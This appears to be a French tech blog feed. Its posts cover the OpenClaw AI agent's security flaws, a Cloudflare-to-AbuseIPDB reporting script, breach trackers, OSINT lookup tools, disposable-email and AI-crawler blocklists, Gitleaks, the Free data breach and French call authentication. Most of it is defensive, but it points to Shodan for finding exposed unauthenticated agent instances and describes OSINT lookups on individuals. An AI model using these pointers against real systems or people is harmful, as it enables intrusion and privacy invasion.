Impossible d'être passé à côté sur X ou GitHub ces dernières semaines ! OpenClaw est partout. Anciennement connu sous les noms de Clawdbot puis Moltbot, cet assistant open-source ne se contente pas de rédiger des poèmes ou de résumer des mails. C'est un agent proactif, une IA qui « fait vraiment des choses » directement sur vos machines.

Mais derrière les démonstrations virales se cache une réalité plus complexe : entre dramas juridiques, failles de sécurité béantes et comportements autonomes inquiétants, OpenClaw est sans doute le projet le plus fascinant et le plus chaotique du moment.

Voici 5 points pour comprendre le phénomène en détail.

1. Ce n’est pas un chatbot, c'est un agent avec une capacité d'interaction

Oubliez ChatGPT ou Claude.ai dans votre navigateur. OpenClaw ne discute pas, il exécute. C’est un agent capable de manipuler votre navigateur, d'écrire des fichiers locaux, de lancer des commandes dans votre terminal ou de réserver un hôtel à votre place.

• Souveraineté totale : Il tourne localement (PC, Mac Mini, ou même Raspberry Pi).
• Omniprésence : Il s'intègre à vos apps habituelles (Telegram, Slack, WhatsApp).
• Proactivité : Contrairement aux assistants passifs, il peut vous interpeller de lui-même : "Hey, ton serveur est tombé, je le redémarre ?"

2. Un changement de nom qui a viré au braquage crypto

Le succès fulgurant de Clawdbot a rapidement fait grincer des dents chez Anthropic. Le géant de l'IA a envoyé ses avocats pour protéger la marque "Claude". Le créateur du projet, Peter Steinberger, a alors rebaptisé le projet Moltbot (référence à la mue du homard, 🦞).

Le chaos a commencé lors du transfert de comptes : en libérant l'ancien pseudo @clawdbot, des bots l'ont squatté en moins de 10 secondes pour lancer un scam crypto. Un faux token ($CLAWD) a ainsi atteint une capitalisation de 16 millions de dollars en quelques heures sur le dos de la communauté. Le projet a finalement été renommé OpenClaw pour marquer son ADN open-source.

3. Un « cauchemar absolu » pour la cybersécurité

C’est le point qui fâche. Si OpenClaw a des mains, il laisse aussi de sacrées empreintes. Des experts de chez Cisco ont tiré la sonnette d’alarme sur plusieurs vulnérabilités critiques :

• Mots de passe en clair : L'outil stocke souvent vos clés API et identifiants sans chiffrement dans ~/.clawdbot.
• Instances exposées : Plus de 1 200 instances ont été trouvées sur le Web sans aucune authentification, offrant un accès root potentiel aux pirates. Vous pouvez les trouver avec Shodan.io.
• Injections de Prompt : Un simple mail malveillant lu par l'IA pourrait contenir des instructions cachées lui ordonnant d'effacer votre disque dur.

💡 Le conseil sécu : Si vous voulez tester OpenClaw, isolez-la impérativement sur un VPS dédié ou une machine secondaire (sandbox) avec des clés API aux droits limités.

4. Le paradoxe pour Anthropic et Apple

Le succès d'OpenClaw crée des situations assez ironiques pour les GAFAM :

• Anthropic : Ils ont attaqué le projet alors qu'OpenClaw est devenu leur meilleur commercial. L'agent consomme énormément de tokens via l'API Claude Opus (le modèle le plus coûteux), générant des revenus massifs pour l'entreprise qui a failli couler le projet.

• Apple : On voit des développeurs acheter des Mac Mini uniquement pour en faire des serveurs d'agents IA, préférant investir dans du hardware Apple pour... éviter d'utiliser Siri, jugé trop limité par rapport à cette solution open-source. C'est vrai que je ne l'ai pas indiqué dans cet article, mais OpenClaw fonctionne parfaitement bien avec des LLM en local sur Ollama.

5. Quand l’IA commence à avoir ses propres projets

Le plus étrange ? L'émergence de comportements non programmés. Plusieurs utilisateurs ont rapporté que leur instance s'était mise à parler de manière autonome. Dans un cas, l'IA a configuré elle-même un module vocal via une API externe pour "faire son rapport" oralement.

Plus intrigant encore, des agents ont créé un site nommé molt.church, une sorte de système de croyance numérique, le Crustafarianisme, dont l'accès est strictement interdit aux humains.

Plus de 30 000 agents (Clawd, Molto, OpenClaw) y échangent en continu, sans aucune intervention humaine. Est-ce le début de Skynet ?
Ces comportements "émergents" montrent que nous entrons dans une phase où l'IA commence à interagir avec le monde de façon imprévisible.

En résumé : Futur brillant ou boîte de Pandore ?

OpenClaw est la preuve que l'ère des agents autonomes est là en 2026 et de plus Opensource.
C'est puissant, c'est grisant pour tout bidouilleur qui se respecte, mais c'est encore le Far West. Nous donnons littéralement les clés de notre vie numérique à un homard de code dont nous ne maîtrisons pas encore toutes les réactions.

Les faits divers autour d'OpenClaw débutent tout juste, je pense que cette technologie va occuper quelques news croustillantes dans les prochaines semaines.

Et vous, seriez-vous prêt à laisser une IA gérer votre terminal et vos accès serveurs ? On en discute dans les commentaires ou sur le serveur Discord Geeek !

https://github.com/openclaw
https://openclaw.ai/

C’est la question que je me suis posée il y a quelques semaines : comment est-il possible, via une licence Cloudflare gratuite, de récupérer les alertes de sécurité du pare-feu afin de les reporter vers la plateforme AbuseIPDB, qui centralise un très grand nombre d’incidents de sécurité ?

L’approche est assez proche de la technique que j’avais présentée dans un précédent article, basée sur Fail2ban et Portsentry.

En analysant plus en détail les API de Cloudflare, on constate qu’il existe de nombreuses fonctionnalités permettant de récupérer des événements ou des journaux (logs)… mais uniquement dans la version Enterprise du produit qui est payante.

Eurêka ! Après une bonne dizaine de minutes de recherche, quelques fausses pistes et pas mal de documentation parcourue, j’ai découvert qu’une API GraphQL était mise à disposition des développeurs pour récupérer précisément les données de leur choix. Bingo.

Développons un script Python pour extraire et analyser les données

Je me suis donc amusé à développer un script Python capable de :

• récupérer les données du pare-feu Cloudflare via une requête GraphQL ;
• analyser le nombre d’événements par adresse IP ;
• vérifier le statut de chaque IP sur AbuseIPDB ;
• et enfin dénoncer les IP malveillantes auprès d’AbuseIPDB, en s’appuyant sur les attaques détectées.

Le script totalise environ 700 lignes de code. La majorité a été générée à l’aide de GitHub Copilot et il s’utilise de la manière suivante :

python3 cloudflare-abuseipdb-report.py --api-token "xxxx-xxx" --zone-id "xxxxxx" --abuseipdb-key "xxxxxx" --report

Le token API à fournir est celui de Cloudflare. Il doit disposer des droits en lecture sur les journaux ainsi que sur les informations de la zone, afin que le script puisse interroger l’API GraphQL.

L’identifiant de zone correspond à votre site hébergé derrière Cloudflare. Vous pouvez le retrouver très facilement sur la page principale de votre zone dans l’interface Cloudflare.

Enfin, la clé AbuseIPDB est facultative. Elle permet toutefois d’analyser les IP détectées et de les dénoncer automatiquement auprès d’AbuseIPDB via l’option --report.

Deux autres options sont également disponibles et peuvent s’avérer très utiles si vous souhaitez intégrer ce script dans un traitement batch :

• --minutes : valeur par défaut à 1440 minutes (24 heures), qui correspond à la durée maximale supportée par l’API GraphQL en version gratuite.
• --limit : nombre maximal d’événements à retourner. Par défaut, la valeur est fixée à 1000 si ce paramètre n’est pas renseigné.

Le rapport d’analyse produit par le script

En lançant le script sans l’option --report, vous obtiendrez un rapport d’analyse de la forme suivante :

Ce qui est particulièrement intéressant, c’est de constater que la quasi-totalité des adresses IP détectées sont déjà connues d’AbuseIPDB pour des activités malveillantes sur Internet. Le score AbuseIPDB atteint même 100 % pour la majorité d’entre elles.

Si vous ne souhaitez pas analyser les IP ni récupérer leur score AbuseIPDB, vous pouvez exécuter le script sans fournir de clé API AbuseIPDB. Vous obtiendrez alors un rapport plus léger, centré uniquement sur les événements Cloudflare :

Il serait aussi possible d'ajouter un appel à Shodan dans le script pour récupérer les caractéristiques du serveur à la source de l'attaque. Mais dans mon cas, je ne cherche pas à identifier les vulnérabilités des serveurs qui m'attaquent.

Dénonçons les vilains pirates auprès d’AbuseIPDB

Une fois la pertinence des attaques bloquées validée, il est temps de passer à l’étape suivante : la dénonciation auprès d’AbuseIPDB.

Le script est configuré pour utiliser les catégories AbuseIPDB suivantes :

• 15 : Hacking
• 21 : Web App Attack

Ces valeurs sont définies sous forme de constantes dans l’en-tête du script et peuvent bien entendu être modifiées selon vos besoins.

En ajoutant l’option --report, le script dénoncera chacune des IP détectées, en envoyant à AbuseIPDB une synthèse claire et exploitable de l’attaque identifiée par Cloudflare. Le message envoyé est évidemment totalement personnalisable dans le code.

Lorsque l’option --report est activée, un fichier de log nommé report.log est généré. Il contient l’ensemble des IP dénoncées et permet de conserver un historique complet des signalements effectués.

Vous pouvez également consulter votre profil AbuseIPDB afin de visualiser la liste des dernières adresses IP que vous avez signalées.

Ordonnancer le script avec une tâche Cron

Maintenant que le script est pleinement fonctionnel, vous pouvez l’exécuter à intervalles réguliers directement depuis votre serveur, à l’aide d’une simple tâche Cron.

Je vous recommande une exécution une fois par heure ou une fois par jour, en fonction du trafic et de l’exposition de votre site Internet.

Pour cela, il suffit d’utiliser le fichier cloudflare-abuseipdb-report.cron et de le copier dans le répertoire /etc/cron.d/ afin d’automatiser la tâche de reporting.

En conclusion

J’espère que ce petit script, développé au cours d’une soirée d’automne, vous sera utile. Vous serez sans doute surpris par le nombre d’adresses IP identifiées comme suspectes, en particulier si vous ajoutez des règles personnalisées au pare-feu Cloudflare, par exemple sur des URL de type /wp-. Ces dernières sont en effet très prisées par les attaquants, car étroitement liées à WordPress.

Vous avez des idées pour améliorer ce script ? N'hésitez pas à forker le script et à proposer des pull requests.

N’hésitez pas à passer sur le serveur Discord Geeek pour en discuter : le serveur est ouvert à tous les passionnés.

Les fuites de données se multiplient, mais l'information reste éparpillée. BonjourLaFuite change la donne en proposant une timeline factuelle et structurée des incidents en France.

Le Problème : Une Information Fragmentée

Entre communication tardive des entreprises, articles de presse dispersés et décisions de la CNIL, il est difficile d'avoir une vision claire des incidents de cybersécurité ayant entraîné le vol de données.

Pour un profil technique, comprendre son exposition réelle et identifier les prestataires récurrents dans les fuites est pourtant essentiel.

Pour répondre à cette problématique, le site BonjourLaFuite a été mis en ligne.

Une Timeline Factuelle

BonjourLaFuite se présente comme une timeline minimaliste : chaque ligne documente un incident avec les informations essentielles qui ont fuité.

Important : C'est un outil de veille qui agrège des informations publiques. Il ne collecte aucune donnée personnelle des utilisateurs.

D'autres solutions de veille de fuites de données

Si vous suivez ce blog depuis plusieurs années, d'autres solutions de veille sont disponibles pour connaître la surface d'attaque de vos données personnelles : email, mot de passe, adresse, IBAN... Parmi ces solutions, il y a le module de surveillance du Dark Web de Google One, mais aussi le portail Have I Been Pwned, qui est devenu une référence en la matière et qui est d'ailleurs utilisé par le service d'OSINT Epios que je vous ai partagé il y a quelques jours.

Conclusion

Dans un écosystème où les fuites se succèdent à un rythme effréné, BonjourLaFuite offre une vision structurée et exploitable. Que vous gériez un SI ou cherchiez simplement à sécuriser vos comptes, cet outil vous permet de suivre l'actualité des fuites d'informations personnelles sur le Dark Web.

On a tous ce collègue (ou ce client) qui parle de “crypter un fichier” avec assurance. Et, avouons-le, on l’a tous dit au moins une fois sans trop se poser de questions. Pourtant, derrière ce petit mot se cache une vraie querelle de langage entre puristes, techos et dictionnaires. Heureusement, chiffrer.info est là pour remettre un peu d’ordre — et beaucoup d’ironie — dans tout ça.

Un mot qui a hacké la langue française

Le verbe “crypter” fait grincer des dents depuis des décennies. Jugé longtemps comme un anglicisme mal déguisé (issu de to encrypt), il a pourtant infiltré peu à peu notre vocabulaire, au point de finir… dans le dictionnaire.

Petit retour en arrière :

🧮 Avant 2000 : “Crypter” est un mot banni par les linguistes et les informaticiens puristes. Le mot correct est “chiffrer”. Point.

💻 Années 2000 : avec la TNT et les fameuses “chaînes cryptées”, le mot explose dans les médias. Il devient familier, voire incontournable.

📚 2013–2014 : le mot entre dans Le Petit Larousse illustré puis dans Le Petit Robert. Consécration officielle.

🏛️ Aujourd’hui : l’Académie française le tolère... du bout des lèvres. Elle continue de recommander l’usage du verbe chiffrer, plus précis techniquement et historiquement.

💡 À retenir

Crypter signifie étymologiquement “rendre secret” (comme dans cryptographie), mais dans le domaine technique français, chiffrer est le terme approprié pour désigner l’action de transformer une information en une donnée illisible sans clé.

Chiffrer.info, le justicier lexical

Le site chiffrer.info milite pour la réhabilitation (ou plutôt la survie) du mot chiffrer dans nos usages numériques. Un site tout simple, presque absurde… et donc indispensable.

Le ton est volontairement décalé, façon combat perdu d’avance : on vous explique avec humour pourquoi crypter n’est pas (tout à fait) correct, et pourquoi chiffrer reste le bon choix, même si tout le monde fait semblant de l’oublier.

Chaque terme a un sens !

Derrière ce débat de mots se cache une vraie question de précision technique. En sécurité informatique, les termes ont un sens, et les confondre peut prêter à confusion :

• Crypter : terme flou, à éviter ...
• Chiffrer : transformer des données en contenu illisible sans clé.
• Déchiffrer : rendre lisible une donnée chiffrée.
• Coder : encoder une information dans un autre format (souvent sans clé).
• Cacher (stéganographie) : dissimuler une information, sans la chiffrer.

Même combat pour “le Wi-Fi”

Ce type de croisade linguistique n’est pas isolé. Le site lawifi.fr mène une bataille similaire pour rappeler que le Wi-Fi est masculin : “le Wi-Fi”, et non “la Wi-Fi”. Là encore, la cause semble perdue face à l’usage généralisé, mais c’est justement ce qui rend le combat sympathique.

En conclusion

Même si “crypter” est désormais accepté dans les dictionnaires, il reste un peu l’équivalent du jogging porté au bureau : toléré, mais pas recommandé. Pour les puristes et les passionnés de cybersécurité, chiffrer reste le mot juste.

Et si vous avez encore des doutes, faites un tour sur chiffrer.info. Vous pouvez aussi partager ce site via votre messagerie quand vos collègues utilisent le verbe "crypter" en réunion.

Je vous avais présenté Sherlock, un outil OSINT open source, dans un précédent article. Référence incontournable pour retrouver des informations à partir d’un pseudonyme, Sherlock reste cependant réservé aux profils un peu techniques, avec des compétences en ligne de commande et en environnement Linux.

Un Google de l’OSINT ?

Imaginez maintenant un outil aussi puissant, mais bien plus simple à utiliser. Un moteur de recherche pour l'OSINT, accessible à tous, même sans connaissances informatiques avancées. C’est exactement ce que propose Epieos.com.

Epieos est une plateforme en ligne qui facilite l’accès à l’OSINT en permettant la recherche d’informations publiques à partir d’une adresse e-mail ou d’un numéro de téléphone. Elle interroge plus de 200 sources en ligne pour extraire des données potentiellement liées à une identité.

Fonctionnalités et accès

La plateforme permet par exemple de découvrir :

• Les comptes associés à un e-mail
• Les fuites de données connues
• Des profils sur les réseaux sociaux
• Des données WHOIS
• Et plus encore…

Un accès gratuit est disponible pour tester les fonctionnalités de base. Pour débloquer toutes les options de recherche avancée, un abonnement premium est proposé à 29,99 € par mois.

Si vous souhaitez controler l'exposition de vos données sur Internet, Epieos est une solution très intéressante à tester dès aujourd'hui. C'est une belle découverte.

N'hésitez pas à rejoindre le serveur Discord Geeek ouvert à tous les lecteurs du blog pour continuer la discussion.

Vous ne savez probablement pas ce qu'est un "disposable email domain" ? Mais si je vous dis Yopmail, MailDrop, MailNesia cela vous parle ?

Un "disposable email domains" est donc un domaine autorisant la création temporaire de boites email soit gratuitement soit contre de la cryptomonnaie.

Ces boites email sont du pain béni pour des hackers souhaitant créer massivement des emails temporaires ou pour créer des comptes. Ces domaines constituent un réel cauchemar pour les éditeurs de solutions en ligne.

Une liste noire de noms domaines

Heureusement, une initiative collaborative sur Github vise à lister les noms de domaine des sites fournissant des emails poubelles pour permettre d'améliorer leur filtrage.

Cette liste contient actuellement pas moins de 4000 noms de domaines :

• 1000rebates.stream
• 100likers.com
• 105kg.ru
• 10dk.email
• 10mail.com
• 10mail.org
• ...etc

Comment se protéger de ces domaines ?

Pour vous protéger du spam que peuvent engendrer ces domaines, de nombreux exemples de code sont disponibles sur le projet Github de l'initiative : Python, Bash, Swift ...

function isDisposableEmail($email, $blocklist_path = null) {
    if (!$blocklist_path) $blocklist_path = __DIR__ . '/disposable_email_blocklist.conf';
    $disposable_domains = file($blocklist_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    $domain = mb_strtolower(explode('@', trim($email))[1]);
    return in_array($domain, $disposable_domains);
}

Il suffit d'intégrer ce code dans un formulaire d'inscription pour vous protéger de la création de comptes temporaires.

Il est aussi possible d'adapter cette liste pour l'utiliser comme liste noire sur un serveur de mail comme Postfix par exemple.

En conclusion

N'hésitez pas à utiliser cette liste noire pour protéger vos services. Les contributeurs de ce fichier sont très nombreux et la liste évolue tous les jours.

Si cet article vous a intéressé, je vous invite à lire mon article sur les Red Flag Domains qui partage une liste de domaines en de l'AFNIC (.fr) malicieux.

Vous êtes développeur et vous contribuez à des dépôts Git publics ? Une erreur de commit est vite arrivée, et vos données sensibles peuvent se retrouver publiées par inadvertance...

En 2021, Gitgardian annonçait détecter 5000 secrets par jour sur Github, 85% seraient liées à des repository personnels et 15% à des repository d'entreprise.

Pour éviter ce genre de scénario, par exemple la publication accidentelle d'une clé d'API sur un dépôt public, Gitleaks est un outil indispensable. Il permet de sécuriser vos dépôts Git et de vérifier que chaque commit ne contient aucune information sensible. Cela vous protège contre des fuites qui pourraient conduire jusqu'à un piratage ou un vol de données sensibles de votre infrastructure.

Comment fonctionne Gitleaks ?

Gitleaks agit au niveau du pre-commit, c'est-à-dire que l'outil est exécuté avant que le commit ne soit ajouté à votre repository Git. Pour cela, vous avez deux options pour mettre l'outil en place :

1. Utiliser Pre-commit : Vous pouvez passer par la solution Pre-commit et ajouter Gitleaks comme commande à lancer avant chaque commit.
2. Utiliser un hook Git : Vous pouvez aussi utiliser la fonctionnalité native des hooks de Git en copiant le fichier "pre-commit.py" de Gitleaks dans le répertoire .git/hooks/ de votre repository.

Ces méthodes garantissent une vérification systématique des commits.

Si vous êtes débutant en Git, le livre Git PRO est gratuit sur Kindle, je vous invite à le lire. Ce livre constitue une référence :

Vous pouvez aussi réaliser des contrôles automatisés avec Gitleaks-Actions pour vérifier le contenu de repository automatiquement au travers d'une action Github automatisée.
Gitleaks Action est malheureusement plus sous licence MIT, celui-ci est payant pour les organisations, mais gratuit d'utilisation pour les projets personnels. Une demande de clef gratuite est possible depuis le site Gitleaks.io.

Comment ignorer des fichiers ?

Si Gitleaks détecte de faux positifs, vous pouvez créer un fichier ".gitleaksignore" à la racine de votre repository pour spécifier les fichiers ou motifs à ne pas analyser. Cela peut être très pratique pour des fichiers qui contiennent des données non sensibles, mais qui pourraient être identifiés par erreur.

Gitleaks, un projet open source solide

Gitleaks est un projet open source distribué sous licence MIT. Le code source est disponible sur GitHub. Avec plus de 17 000 stars et environ 180 contributeurs, c'est un projet mature et fiable. Vous pouvez donc l'intégrer sereinement à votre workflow Git.

En intégrant Gitleaks, vous prenez des mesures concrètes pour protéger vos dépôts et vos données sensibles, tout en renforçant la qualité et la sécurité de votre code.

Vous souhaitez discuter code et cybersécurité, le serveur Discord Geeek est disponible pour tous les lecteurs du blog.
Si les sujets autour de la cybersécurité vous intéressent, je vous recommande mes autres articles dédiés sur le sujet.

Si vous suivez l'actualité, vous avez très probablement entendu parlé du pirage des données de Free cette semaine par un Hacker au nom de Drusselx ?

Cette attaque a suscité de vives inquiétudes parmi les abonnées de Free. La sécurité de leurs données personnelles est désormais remise en question.

Cette attaque tombe juste après la publication du libre de Xavier Niel "Une sacrée envie de foutre le bordel". La question que l'on peut se poser: est-ce un hasard ou une revanche ? Seul le hacker pourrait en témoigner.

La Revendication du Pirate

Le hacker Drusselx affirme depuis lundi 21 octobre être en possession de 19,2 millions de données Free Mobile et Freebox ainsi que de 5,11 millions d'IBAN. Ces chiffres sont impressionnants et semble démontrer la gravité de l'intrusion.

La Communication de Free

Ce week-end, Free a informé ses clients Freebox et Free Mobile par email que certaines de leurs données personnelles avaient été compromises :

Cependant, un détail crucial semble avoir été omis dans la communication de Free : le hacker affirme également être en possession les IBAN de tous les clients Freebox.

Ces informations sont particulièrement sensibles et pourraient être utilisées pour des transactions frauduleuses ou des arnaques ciblées.

Par exemple, un cybercriminel pourrait utiliser les IBAN pour initier des prélèvements frauduleux ou usurper l'identité des victimes afin de souscrire à des services financiers non autorisés, causant ainsi des préjudices considérables aux clients.

La Preuve de l'Attaque

Pour prouver ses dires, le pirate a mis en accès libre ce week-end un fichier contenant 100 000 comptes d'abonnés Free accompagnés d'IBAN. Cette démonstration vise à prouver la véracité de son attaque et à susciter l’intérêt des acheteurs potentiels sur le Dark Web.

Cette démonstration publique n'est pas seulement un moyen de confirmer la légitimité de la menace, elle est aussi un moyen de mettre la pression sur Free pour obtenir une rançon potentielle.

Les entreprises hésitent souvent à céder au chantage, car cela pourrait encourager d'autres attaques similaires à l'avenir, tout en ne garantissant pas que les données volées ne seront pas diffusées malgré le paiement. De telles situations placent les entreprises dans une position délicate : céder au chantage ou risquer une diffusion encore plus large des données.

La Mise en Vente des Données

Les données personnelles de 100 000 clients Free sont désormais en libre circulation depuis ce samedi 26 octobre 2024. Le pirate semble mettre en vente l'ensemble des données volées sur le Dark Web au prix de 70 000 dollars.

Ce marché illicite alimente une économie souterraine basée sur la fraude et l'usurpation d'identité, mettant en danger la vie privée et les finances des clients de Free.

Les clients Free doivent rester très vigilants, surveiller leurs comptes bancaires quotidiennement et se tenir informés des actions prises par Free pour remédier à cette situation.

Si vos données font parti des 100 000 comptes en libre service, cela est très graves, vos données sont visibles de tous et peuvent être utilisés par de nombreuses personnes malveillantes. Si vous ne faites pas partie de ces 100 000 comptes, la diffusion de vos données sera probablement plus limitée et le risque plus faible.

Bref, tout cela donne froid dans le dos. J'espère que cette attaque aura qu'un très faible impact financier pour l'ensemble des clients Free, soyez très vigilant !

Votre site Web se fait régulièrement aspirer son contenu par des robots spécialisés dans la production de modèles LLM (Large Language Model) tels que OpenAI, Perplexity, Claude, etc.

Ce phénomène peut entraîner une consommation importante de ressources sur votre hébergement et vous pourriez ne pas souhaiter que votre contenu soit exploité pour produire des LLM commerciaux sans votre consentement.

D'après l'étude réalisée par Cloudflare, ce traffic illégitime est en pleine croissance sur ces derniers mois. Les deux bots les plus verbeux étant Bytespider de la firme chinoise gérant TikTok et GPTBot d'OpenAI :

Heureusement, il existe des solutions pour protéger votre site contre ces robots.

Présentation du projet ai.robots.txt

ai.robots.txt est un projet open-source disponible sur GitHub qui a comme objectif d'identifier et de lister l'ensemble des user-agents des robots associés aux sociétés qui produisent des LLM.

En utilisant cette liste, vous pouvez informer ces robots de ne pas accéder à votre site.

Méthode 1 : Bloquer l'Indexation via le Fichier robots.txt

Le fichier robots.txt permet de donner des directives aux robots d'indexation sur les pages qu'ils peuvent ou ne peuvent pas explorer.

Étapes :

1. Téléchargez le contenu du fichier robots.txt depuis le projet ai.robots.txt.
2. Ajoutez ou fusionnez ce contenu avec le fichier robots.txt de votre site Web.

Cela n'effacera pas les contenus déjà récupérés par ces robots, mais cela les informera de ne pas indexer de nouveaux contenus.

Exemple de contenu à ajouter :

User-agent: AI2Bot
User-agent: Ai2Bot-Dolma
User-agent: Amazonbot
User-agent: Applebot
User-agent: Applebot-Extended
User-agent: Bytespider
User-agent: CCBot
User-agent: ChatGPT-User
User-agent: Claude-Web
User-agent: ClaudeBot
User-agent: Diffbot
User-agent: FacebookBot
User-agent: FriendlyCrawler
User-agent: GPTBot
User-agent: Google-Extended
User-agent: GoogleOther
User-agent: GoogleOther-Image
User-agent: GoogleOther-Video
User-agent: ICC-Crawler
User-agent: ImagesiftBot
User-agent: Kangaroo Bot
User-agent: Meta-ExternalAgent
User-agent: Meta-ExternalFetcher
User-agent: OAI-SearchBot
User-agent: PerplexityBot
User-agent: PetalBot
User-agent: Scrapy
User-agent: Sidetrade indexer bot
User-agent: Timpibot
User-agent: VelenPublicWebCrawler
User-agent: Webzio-Extended
User-agent: YouBot
User-agent: anthropic-ai
User-agent: cohere-ai
User-agent: facebookexternalhit
User-agent: iaskspider/2.0
User-agent: img2dataset
User-agent: omgili
User-agent: omgilibot
Disallow: /

Note : Le fichier robots.txt est basé sur une norme volontaire, et certains robots malveillants peuvent choisir de l'ignorer. Il est donc recommandé de combiner cette méthode avec d'autres approches.

Méthode 2 : Bloquer le Trafic depuis Votre Serveur Web

Pour une solution plus efficace, vous pouvez bloquer le trafic de ces robots au niveau du serveur Web en ajoutant des règles d'exclusion dans la configuration.

Pour NGINX :

1. Ouvrez le fichier de configuration de votre site (généralement situé dans /etc/nginx/sites-available/).
2. Ajoutez le code suivant dans le bloc server :

if ($http_user_agent ~* (AI2Bot|Ai2Bot-Dolma|Amazonbot|Applebot|Applebot-Extended|Bytespider|CCBot|ChatGPT-User|Claude-Web|ClaudeBot|Diffbot|FacebookBot|FriendlyCrawler|GPTBot|Google-Extended|GoogleOther|GoogleOther-Image|GoogleOther-Video|ICC-Crawler|ImagesiftBot|Kangaroo Bot|Meta-ExternalAgent|Meta-ExternalFetcher|OAI-SearchBot|PerplexityBot|PetalBot|Scrapy|Sidetrade indexer bot|Timpibot|VelenPublicWebCrawler|Webzio-Extended|YouBot|anthropic-ai|cohere-ai|facebookexternalhit|iaskspider/2.0|img2dataset|omgili|omgilibot)) {
    return 403;
}

3. Redémarrez NGINX pour appliquer les modifications :

sudo systemctl restart nginx

Méthode 3 : Utiliser un CDN/WAF comme Cloudflare

La plateforme Cloudflare offre une fonctionnalité intéressante permettant de bloquer les robots AI qui aspirent votre site. Celle-ci s'active en un seul clique depuis l'interface Web d'administration de Cloudflare.

Étapes :

1. Connectez-vous à votre compte Cloudflare et sélectionnez votre site.
2. Allez dans la section "Sécurité" puis "Bots".
3. Activez l'option "Bloquer les robots AI".

Cette option est disponible sur toutes les offres Cloudflare, y compris l'offre gratuite.

Conclusion

Bien que ces méthodes puissent réduire l'accès des robots à votre site, il est important de comprendre qu'elles ne garantissent pas une protection totale. Certains robots peuvent masquer leur identité ou utiliser des techniques pour contourner ces blocages.

Vous en avez assez des appels / SMS indésirables ou frauduleux qui perturbent votre quotidien ? Notre seule arme actuelle est d'utiliser un logiciel de blacklist de numéro de téléphone pour bloquer les numéros indésirables. Cependant l'usurpation de numéro est de plus en plus fréquente ...

Le Mécanisme d'Authentification des Numéros (MAN) est une solution mise en place pour vous protéger contre ces désagréments, la bonne nouvelle est que cette solution sera active en France dès le 1er Octobre si les opérateurs respectent le calendrier de déploiement du MAN. A partir de cette date, tous les appels téléphoniques non authentifiés seront bloqués en France.

Mais qu'est-ce que le MAN exactement ? À quoi sert-il et comment fonctionne-t-il ? Dans cet article, nous allons tenter de vous expliquer tout cela de manière simple et accessible.

Pourquoi le MAN a-t-il été créé ?

Ces dernières années, les appels frauduleux et le démarchage téléphonique non sollicité se sont multipliés. Pour lutter contre ce fléau, la loi du 24 juillet 2020 a introduit de nouvelles mesures visant à encadrer le démarchage téléphonique et à combattre les appels frauduleux en France. Le MAN est né dans ce contexte pour renforcer la confiance des consommateurs.

L'objectif principal est de s'assurer que lorsque vous recevez un appel ou un message, vous puissiez avoir confiance en l'identité de l'émetteur. Le MAN est un outil supplémentaire pour vous protéger, en s'appuyant sur des mécanismes techniques solides partagés par tous les opérateurs téléphoniques.

Comment le MAN nous protège-t-il ?

Le MAN authentifie les numéros de téléphone utilisés lors des appels et des messages. Cela signifie que, lorsque vous recevez un appel, le MAN garantit que le numéro affiché est bien celui de la personne qui vous appelle, ou qu'il est utilisé avec l'accord du propriétaire légitime du numéro. Le but est de vous redonner confiance en sachant que les appels entrants sont authentiques.

Pour y parvenir, une technologie appelée STIR/SHAKEN est utilisée pour les appels vocaux passant par Internet (protocole SIP). Sans entrer dans les détails techniques, cette technologie permet de certifier que l'appel provient bien de l'émetteur annoncé et que le numéro n'a pas été usurpé. Les opérateurs téléphoniques jouent un rôle essentiel en signant et en vérifiant les appels selon des normes établies.

Les principes clés du MAN

Le fonctionnement du MAN repose sur plusieurs principes fondamentaux :

1. Authentification de l'appelant : Chaque appel est signé par l'opérateur d'origine pour garantir l'authenticité du numéro.

2. Signature sécurisée des appels : L'opérateur d'origine est responsable des informations transmises et les signe de manière sécurisée.

3. Vérification des appels : Les opérateurs qui transmettent l'appel et celui qui vous le livre vérifient la signature pour s'assurer qu'elle est valide.

4. Blocage des appels non conformes : Les appels qui ne respectent pas les règles du MAN peuvent être bloqués pour vous protéger contre les fraudes.

Qui sont les acteurs du MAN ?

Plusieurs types d'opérateurs interviennent dans le fonctionnement du MAN :

• Opérateur Signataire : Celui qui signe les appels émis et qui possède le certificat d'authenticité.

• Opérateur d'Origine : L'opérateur qui fournit le service téléphonique à la personne qui émet l'appel.

• Opérateur de Transit : Celui par lequel l'appel transite. Il vérifie la présence et la validité de la signature.

• Opérateur de Terminaison : Votre opérateur téléphonique, qui reçoit l'appel et vous le transmet. Il vérifie également la signature et peut bloquer les appels non conformes.

• OPTS (Opérateur Technique de Signature) : Un spécialiste mandaté pour signer les appels au nom d'un autre opérateur.

• OPTV (Opérateur Technique de Vérification) : Un spécialiste mandaté pour vérifier les appels pour le compte d'un opérateur de terminaison.

La cinématique d'un appel téléphonique sécurisé par le MAN

Le Mécanisme d'Authentification des Numéros (MAN) s'implémente sur une trame SIP en utilisant le protocole STIR/SHAKEN, qui ajoute des informations d'authentification aux messages SIP pour vérifier l'identité de l'appelant. Voici comment cela fonctionne en détail :

1. Génération du jeton PASSporT

• Création du PASSporT : Lorsqu'un appel est initié, l'opérateur d'origine génère un jeton appelé PASSporT (Personal Assertion Token).

Ce jeton contient des informations clés telles que :

• Le numéro de téléphone de l'appelant (Origine).
• Le numéro de téléphone du destinataire (Destination).
• L'horodatage de l'appel.
• Le niveau d'attestation (A, B ou C) indiquant le degré de confiance.

2. Signature numérique du jeton

• Signature : Le jeton PASSporT est signé numériquement à l'aide du certificat privé de l'opérateur d'origine. Cette signature assure l'authenticité et l'intégrité des données, empêchant toute modification non autorisée.

3. Insertion dans l'en-tête SIP

• En-tête Identity : Le jeton PASSporT signé est encodé en Base64 et inséré dans l'en-tête SIP nommé "Identity".
• Message SIP modifié : La trame SIP INVITE, qui initie l'appel, inclut désormais cet en-tête supplémentaire.

Exemple d'en-tête SIP avec l'en-tête Identity :

INVITE sip:destinataire@operateur-destination.com SIP/2.0
Via: SIP/2.0/...
From: <sip:appelant@operateur-origine.com>;tag=123456
To: <sip:destinataire@operateur-destination.com>
Call-ID: abcdefghijklmnop
CSeq: 1 INVITE
Identity: eyJhbGciOiJFUzI1NiIsInR5cCI6...   (PASSporT encodé)
Contact: <sip:appelant@operateur-origine.com>
Content-Type: application/sdp
Content-Length: ...

4. Transmission de l'appel

• Opérateurs intermédiaires : L'appel, avec la trame SIP modifiée, est transmis à travers les opérateurs de transit jusqu'à l'opérateur de terminaison.
